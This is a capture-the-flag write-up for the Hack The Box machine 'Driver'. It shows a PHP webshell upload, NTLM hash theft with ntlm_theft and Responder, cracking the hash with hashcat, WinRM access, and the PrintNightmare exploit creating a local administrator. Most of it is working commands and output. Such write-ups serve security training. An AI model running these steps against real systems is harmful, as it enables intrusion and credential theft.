Machine link.

IppSec Walkthrough.

Footprinting

Open ports

First, let's use Nmap to scan the open ports:

kali@kali:~$ nmap -sS -p- -Pn -v10 -oA syn_full 10.10.11.106
PORT     STATE SERVICE      REASON
80/tcp   open  http         syn-ack ttl 127
135/tcp  open  msrpc        syn-ack ttl 127
445/tcp  open  microsoft-ds syn-ack ttl 127
5985/tcp open  wsman        syn-ack ttl 127

kali@kali:~$ nmap -sC -sV -p80,135,445,5985 -Pn -v10 -oA vuln 10.10.11.106
PORT  STATE SERVICEREASON VERSION
80/tcpopen  httpsyn-ack ttl 127 Microsoft IIS httpd 10.0 
| http-methods:
|Supported Methods: OPTIONS TRACE GET HEAD POST 
|_  Potentially risky methods: TRACE
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D  
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).  
|_http-server-header: Microsoft-IIS/10.0  
135/tcp  open  msrpc  syn-ack ttl 127 Microsoft Windows RPC 
445/tcp  open  microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 
5985/tcp open  httpsyn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 
|_http-title: Not Found 
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

It's a Windows machine, running an IIS web server on port 80, and another service on port 5985 (which we'll cover later).

HTTP

The first request asks for a username and password. Surprisingly, my first admin:admin attempt worked:

>>>
GET / HTTP/1.1
Host: 10.10.11.106
Authorization: Basic YWRtaW46YWRtaW4=

<<<
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.3.25

Metasploit could have been used to brute-force the Basic authentication.

In the website, there are:

• An upload page: /fw_up.php

• An image: /images/ricoh.png

• A possible hostname@domain: support@driver.htb

Rabbit Holes

The directory indexing is not enabled in /images:

>>>
GET /images/ HTTP/1.1
Host: 10.10.11.106
Authorization: Basic YWRtaW46YWRtaW4=

<<<
HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/10.0

Regarding the Host header, 10.10.11.106 driver.htb can be added into /etc/hosts. Indeed, some wesites' behavior changes depending on the Host header:

The Host Header tells the webserver which virtual host to use (if set up). You can even have the same virtual host using several aliases (e.g. driver.htb, config.driver.htb, ...). In this case, you still have the possibility to read that header manually in your web app if you want to provide different behavior based on different domains addressed. This is possible because in your webserver you can (must?) set up one vhost to be the default host. This default vhost is used whenever the host header does not match any of the configured virtual hosts.

A Host header field must be sent in all HTTP/1.1 request messages. A 400 (Bad Request) status code will be sent to any HTTP/1.1 request message that lacks a Host header field or contains more than one.

However, the website doesn't behave differently when driver.htb is requested. Looking for Virtual hosts doesn't help neither:

gobuster vhost -k -w /usr/share/seclists/Discovery/DNS/deepmagic.com-prefixes-top50000.txt -u http://driver.htb/ -t 50 -H 'Authorization: Basic YWRtaW46YWRtaW4=' -q -o gobuster_vhosts.txt

Moving on, I see /fw_up.php page has an upload feature. I could upload a PHP webshell:

>>>
POST /fw_up.php HTTP/1.1
Host: 10.10.11.106
Content-Type: multipart/form-data; boundary=---------------------------979429347213303672556720285
Authorization: Basic YWRtaW46YWRtaW4=

-----------------------------979429347213303672556720285
Content-Disposition: form-data; name="printers"

HTB DesignJet
-----------------------------979429347213303672556720285
Content-Disposition: form-data; name="firmware"; filename="simple-backdoor.php"
Content-Type: application/x-php

<?php system($_REQUEST['cmd']);?>
-----------------------------979429347213303672556720285--

<<<
HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
Location: fw_up.php?msg=SUCCESS

<<<
Select printer model and upload the respective firmware update to our file share. 
Our testing team will review the uploads manually and initiates the testing soon.

But I don't know where the webshell is uploaded :-\

dirbuster (without forgetting the Authentication header) showed no sensitive URLs:

kali@kali:~$ dirb http://10.10.11.106/ /usr/share/dirb/wordlists/big.txt -H "Host: driver.htb" -H "Authorization: Basic YWRtaW46YWRtaW4=" -o dirb_80.txt

---- Scanning URL: http://10.10.11.106/ ----
==> DIRECTORY: http://10.10.11.106/images/
==> DIRECTORY: http://10.10.11.106/Images/
+ http://10.10.11.106/index.php (CODE:200|SIZE:4279)

No public vulnerabilities on the PHP version could be found as well :-/:

Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.3.25

No backup files (e.g. index.php.bak, index.php~) could be found :-[:

kali@kali:~$ dirb http://10.10.11.106/index.php /usr/share/dirb/wordlists/mutations_common.txt -t
kali@kali:~$ dirb http://10.10.11.106/fw_up.php /usr/share/dirb/wordlists/mutations_common.txt -t

NTLM Hash Stealer & Responder

I finally went out of these rabbit holes! It is possible to steal the NTLM of a Windows machine if the victim open a malicious file:

• byt3bl33d3r.github.io/practical-guide-to-nt..

• infosecwriteups.com/abusing-ntlm-relay-and-..

Since MS08-068, you cannot relay a Net-NTLM hash back to the same machine you got it from (e.g. the 'reflective' attack) unless you're performing a cross-protocol relay (which is an entirely different topic). However you can still relay the hash to another machine.

SMB Signing needs to be disabled on the machine you're relaying too. With the exception of Windows Server OS's, all Windows operating systems have SMB Signing disabled by default.

Let's check if SMB Signing is disabled:

kali@kali:~$ crackmapexec smb 10.10.11.0/24 --gen-relay-list cme_smb_targets.txt
SMB         10.10.11.101    445    WRITER           [*] Windows 6.1 Build 0 (name:WRITER) (domain:) (signing:False) (SMBv1:False)
SMB         10.10.11.102    445    EARTH            [*] Windows 10.0 Build 17763 x64 (name:EARTH) (domain:windcorp.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.106    445    DRIVER           [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)

We're only interested in the DRIVER machine.

The signing is set to False, which means NTLM hashes could be stolen! To do so, we need to poison the SMB service using responder:

kali@kali:~$ sudo responder -I tun0

Then, we can create bunch of files linking to an inexistant share we own using NTLM_Theft

ntlm_theft [...] generates 21 different types of hash theft documents. These can be used for phishing when either the target allows smb traffic outside their network, or if you are already inside the internal network.

The benefits of these file types over say macro based documents or exploit documents are that all of these are built using "intended functionality". None were flagged by Windows Defender Antivirus on June 2020, and 17 of the 21 attacks worked on a fully patched Windows 10 host.

kali@kali:~$ python ntlm_theft.py --generate all --server 10.10.15.101 --filename responder

My kali (10.10.15.101) is set as the server.

Uploading all of these files in the website, I realized the lnk extension worked!

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:67a7a5698e868c4b:CFB25FAF60CA4EBA9C220CEC8EEC4016:010100000000000080746EE6B0EFD70163437CDC35832326000000000200080057005A005600440001001E00570049004E002D005600580036004B00300044005200310031003100460004003400570049004E002D005600580036004B0030004400520031003100310046002E0057005A00560044002E004C004F00430041004C000300140057005A00560044002E004C004F00430041004C000500140057005A00560044002E004C004F00430041004C000700080080746EE6B0EFD70106000400020000000800300030000000000000000000000000200000577C4AF061A90A5EE9289C8A49D0C8D66D643F896E2ECC7FCEBDD0B5968444760A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E00310030003100000000000000000000000000
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony

Then, the hash can be cracked:

kali@kali:~$ hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.11.106.txt /usr/share/wordlists/rockyou.txt -o hashcat.output
kali@kali:~$ cat hashcat.output
TONY::DRIVER:89a952d5d0ae0dc8:cb699871fdc24c0c7c573c39cb8f91e4:010100000000000080746ee6b0efd7019aa00c07c847f9b1000000000200080057005a005600440001001e00570049004e002d005600580036004b00300044005200310031003100460004003400570049004e002d005600580036004b0030004400520031003100310046002e0057005a00560044002e004c004f00430041004c000300140057005a00560044002e004c004f00430041004c000500140057005a00560044002e004c004f00430041004c000700080080746ee6b0efd70106000400020000000800300030000000000000000000000000200000577c4af061a90a5ee9289c8a49d0c8d66d643f896e2ecc7fcebdd0b5968444760a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310035002e00310030003100000000000000000000000000:liltony

The credentials are tony:liltony !

Crackmapexec

Let's check we have access to the shares of the victim:

kali@kali:~$ crackmapexec smb 10.10.11.106 -u 'tony' -p 'liltony' --shares
SMB         10.10.11.106    445    DRIVER           [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
SMB         10.10.11.106    445    DRIVER           [+] DRIVER\tony:liltony
SMB         10.10.11.106    445    DRIVER           [+] Enumerated shares
SMB         10.10.11.106    445    DRIVER           Share           Permissions     Remark
SMB         10.10.11.106    445    DRIVER           -----           -----------     ------
SMB         10.10.11.106    445    DRIVER           ADMIN$                          Remote Admin
SMB         10.10.11.106    445    DRIVER           C$                              Default share
SMB         10.10.11.106    445    DRIVER           IPC$                            Remote IPC

Yes we have ! Do we have RCE ?

kali@kali:~$ crackmapexec smb 10.10.11.106 -u 'tony' -p 'liltony' -x 'dir'
SMB         10.10.11.106    445    DRIVER           [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
SMB         10.10.11.106    445    DRIVER           [+] DRIVER\tony:liltony

kali@kali:~$ crackmapexec smb 10.10.11.106 -u 'tony' -p 'liltony' -X 'dir'
SMB         10.10.11.106    445    DRIVER           [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
SMB         10.10.11.106    445    DRIVER           [+] DRIVER\tony:liltony

Seems not :/

Note: The content of the shares tony can access are not interesting.

Evil Nightmare

user.txt

Remember that port 5985 was opened ?

PORT     STATE SERVICE      REASON
5985/tcp open  wsman        syn-ack ttl 127

This service is running WinRM

If port 5985 is open but port 5986 is closed this means that the WinRM service is configured to accept connections over HTTP only and encryption is not enabled.

Quickly, I found evil-winrm can be used to exploit that service and get a shell:

kali@kali:~$ evil-winrm -i 10.10.11.106 -u tony -p liltony -P 5985

PS > C:\Users\tony\Documents> whoami
driver\tony

The user flag is:

PS > C:\Users\tony\Desktop> ls


    Directory: C:\Users\tony\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       12/13/2021  11:31 AM        1250056 mimi.exe
-ar---       12/13/2021   9:05 AM             34 user.txt
-a----       12/13/2021  11:18 AM        1927680 win.exe


PS > C:\Users\tony\Desktop> cat user.txt
c11[...]6c5

Note: it is possible to use a Empire's listener and stager to get a reverse shell, as no antivirus blocks it.

Similar to /var/www/html in Linux, Microsoft IIS stores the website contents in C:\inetpub\ by default.

C:\inetpub\wwwroot contains all the web pages and content that will be published on the web. It is the default directory for publishing web pages.

PS C:\inetpub\wwwroot> Get-ChildItem -recurse .


    Directory: C:\inetpub\wwwroot


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         9/7/2021  11:29 PM                images
-a----         9/8/2021   5:06 AM           6136 fw_up.php
-a----         9/8/2021   4:51 AM           4906 index.php


    Directory: C:\inetpub\wwwroot\images


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/7/2021  11:29 PM         201503 ricoh.png

Nothing really interesting in the source code, except that the firmwares are uploaded in C:\firmwares:

if($_SERVER['REQUEST_METHOD']=="POST"){
  $target_dir = "C:\\firmwares\\";

root.txt

In the C:\temp\ directory, there is a folder z87179L19:

PS C:\temp\z87179L19> Get-ChildItem .


    Directory: C:\temp\z87179L19


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/11/2021   7:20 AM                disk1
d-----        6/11/2021   7:20 AM                misc

Googling that directory quickly shows that the machine could be vulnerable to local privilege escalation:

A vulnerability affects several Windows printer drivers for a wide range of printers from Ricoh manufacture. The improperly protected library files are loaded by PrintIsolationHost.exe, a process running as SYSTEM.

Note: I couldn't use Metasploit to exploit that service

After some time, I realized that Print Nightmare was the way to go. Indeed:

• The website contains an image of the RICOH printer, and is named Driver ;

• This CTF was released in 2021 ;

• Print Nightmare was discovered in 2021 (CVE-2021-34527).

More information here:

• msrc.microsoft.com/update-guide/vulnerabili..

• cybersync.org/blogs-en/exploitation_of_the_..

The Print Spooler (spoolsv.exe) is a Windows service that handles print jobs. The description of the service is: "This service spools print jobs and handles interaction with the printer. If you turn off this service, you won't be able to print or see your printers." The service runs by default on both Windows servers and clients.

PS > Get-Service Spooler

Status   Name               DisplayName
------   ----               -----------
Running  Spooler            Print Spooler

A PowerShell version of the exploit has been developed by Caleb Stewart & John Hammond. This script exploit the fact that Print Spooler local privilege escalation to create a local adminstrator account:

PS > Import-Module ./CVE-2021-1675.ps1
PS > Invoke-Nightmare -NewUser "jamarir" -NewPassword "jamarir" -DriverName "PrintMe"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user jamarir as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll

PS > net users jamarir
User name                    jamarir
[...]
Local Group Memberships      *Administrators

Finally, we can use Evil-WinRM again to connect to that administrator account, and grab the root flag:

kali@kali:~$ evil-winrm -i 10.10.11.106 -u jamarir -p jamarir -P 5985
PS > C:\Users\jamarir\Documents> whoami
driver\jamarir

PS > Get-Content C:\Users\Administrator\Desktop\root.txt
7cd[...]c3b

Don't forget to clean behind you :)

PS > rm C:\temp\htb_jamarir

ippsec walkthrough